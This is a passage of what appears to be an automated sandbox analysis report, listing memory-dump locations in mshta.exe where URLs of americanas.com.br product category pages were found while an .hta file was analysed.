00000000.00000003.25404494794.000000000AC54000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387237679.000000000AC4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/celulares-e-smartphones/celular-basico?chave=pfm_hm_tt_1_0_c
Source: mshta.exe, 00000000.00000003.25385047921.000000000955E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25411479647.0000000009577000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460571625.0000000009578000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392497277.0000000009570000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25459140045.0000000009476000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386820435.000000000946F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386864327.0000000009475000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25463225262.000000000957C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000ABB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25409943508.0000000009572000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.000000000955E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387679114.000000000ABC0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25466141832.000000000ABC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25401588246.000000000ABC1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318069432.000000000676A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25487918630.000000000ABC9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/celulares-e-smartphones/pecas-para-celular?chave=pfm_hm_tt_1
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25462689449.000000000ACF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378136388.000000000ABD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386820435.000000000946F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386864327.0000000009475000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000ABB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000ABDC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25488630378.000000000ACF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25483822375.00000000093C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400780155.000000000ABE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402328770.000000000AC1A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403501791.000000000AC22000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25488222994.000000000AC23000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460334244.000000000AC23000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318069432.000000000676A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25478131586.000000000AC23000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387237679.000000000ABE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/celulares-e-smartphones/smartphone/iphone?ordenacao=topSelli
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25429899466.00000000067FB000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25422769315.00000000067FA000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386820435.000000000946F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25438057460.00000000067FF000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460429722.000000000AA71000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386864327.0000000009475000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25486497616.000000000AA71000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318069432.000000000676A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403038428.000000000AA70000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25435450714.00000000067FC000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318505986.000000000BDEE000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/celulares-e-smartphones/smartphone?chave=pfm_hm_tt_1_0_smart
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25465160079.0000000006F1B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25488396530.000000000AC56000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25477736639.000000000AC54000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25459140045.0000000009476000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386820435.000000000946F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397933321.0000000006F1A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386864327.0000000009475000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397841078.000000000B73B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25490436836.000000000B73C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397343224.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404494794.000000000AC54000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387237679.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25375820983.0000000006F1A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318069432.000000000676A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25458855174.0000000006F1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/celulares-e-smartphones/smartwatch-e-smartband?chave=pfm_hm_
Source: mshta.exe, 00000000.00000003.25386576642.000000000947B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404918834.000000000947C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410207961.000000000947C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/celulares-e-smartphones?chave=dk_hm_at_telefonia=
Source: mshta.exe, 00000000.00000003.25386576642.000000000947B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404918834.000000000947C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410207961.000000000947C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/celulares-e-smartphones?chave=dk_hm_at_telefoniannem
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25444186991.000000000A923000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386820435.000000000946F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386864327.0000000009475000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397933321.0000000006EC2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25399279067.000000000A916000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25375820983.0000000006E97000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410412246.0000000006ED0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400030275.000000000A922000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25398775142.000000000A914000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403434218.0000000006ECD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318069432.000000000676A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25405015002.0000000006ECE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318505986.000000000BDEE000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/celulares-e-smartphones?chave=pfm_hm_tt_1_0_celulares
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25317891511.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25477923652.0000000006ED2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318413580.00000000067A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387156704.0000000009469000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397933321.0000000006EC2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25375820983.0000000006E97000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410412246.0000000006ED0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403434218.0000000006ECD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25405015002.0000000006ECE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318505986.000000000BDEE000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/celulares-e-smartphones?chave=pfm_home_smartphones_menu
Source: mshta.exe, 00000000.00000003.25444696283.000000000AAE1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402958159.000000000AAD4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402504692.000000000AAA9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403359290.000000000AAE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/celularesH
Source: mshta.exe, 00000000.00000003.25386576642.000000000947B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25477835168.000000000AC0E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378136388.000000000ABD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377901544.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000ABB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000ABDC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400654336.000000000ABA5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000A9E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400780155.000000000ABE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318069432.000000000676A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377309102.000000000AB99000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387237679.000000000ABE6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000ABCE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377868768.000000000ABA1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25401507649.000000000AC06000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318505986.000000000BDEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/eletrodomesticos/cervejeira?chave=pfm_hm_tt_1_0_cervejeira
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386820435.000000000946F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410252202.0000000009470000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402152855.0000000009470000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/eletrodomesticos/cervejeira?chave=pfm_hm_tt_1_0_cervejeirae
Source: mshta.exe, 00000000.00000003.25386576642.000000000947B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460429722.000000000AA71000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377901544.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25486497616.000000000AA71000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000A9E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318069432.000000000676A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403038428.000000000AA70000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318505986.000000000BDEE000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/eletrodomesticos/coifa-e-depurador
Source: mshta.exe, 00000000.00000003.25386576642.000000000947B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25483562137.0000000006F53000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377901544.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25458566580.0000000006EC2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397933321.0000000006EC2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000A9E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25375820983.0000000006E97000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378502221.0000000006F52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318069432.000000000676A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25482972272.0000000006EC2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318505986.000000000BDEE000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/eletrodomesticos/cooktop?chave=pfm_hm_tt_1_0_cooktop
Source: mshta.exe, 00000000.00000003.25386576642.000000000947B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25385047921.000000000955E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25411479647.0000000009577000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460571625.0000000009578000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392497277.0000000009570000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378136388.000000000ABD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377901544.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000ABB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25409943508.0000000009572000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000ABDC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.000000000955E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000A9E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400780155.000000000ABE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318069432.000000000676A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377309102.000000000AB99000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387237679.000000000ABE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/eletrodomesticos/fogao?chave=pfm_hm_tt_1_0_fogao
Source: mshta.exe, 00000000.00000003.25386576642.000000000947B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25399279067.000000000A948000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25438095878.0000000009C19000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377901544.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000A9E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25479000950.000000000AC66000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410939908.000000000A94C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397343224.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404494794.000000000AC54000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387237679.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318069432.000000000676A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25488441042.000000000AC66000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25432084842.0000000009C17000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25466221929.000000000AC65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/eletrodomesticos/forno-de-embutir?chave=pfm_hm_tt_1_0_forno-
Source: mshta.exe, 00000000.00000003.25386576642.000000000947B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25483562137.0000000006F53000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377901544.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25458566580.0000000006EC2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397933321.0000000006EC2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397841078.000000000B73B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25490436836.000000000B73C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000A9E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25479000950.000000000AC66000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25375820983.0000000006E97000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378502221.0000000006F52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397343224.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404494794.000000000AC54000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387237679.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318069432.000000000676A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/eletrodomesticos/freezer?chave=pfm_hm_tt_1_0_freezer
Source: mshta.exe, 00000000.00000003.25386576642.000000000947B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25385047921.000000000955E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25411479647.0000000009577000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460571625.0000000009578000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392497277.0000000009570000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25422571460.0000000009CD6000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25416179564.0000000009CCF000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25463225262.000000000957C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000ABB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25409943508.0000000009572000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.000000000955E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387679114.000000000ABC0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25466141832.000000000ABC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25438742796.0000000009CD8000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25401588246.000000000ABC1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25425976414.0000000009CD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/eletrodomesticos/geladeira-refrigerador?chave=pfm_hm_tt_1_0_
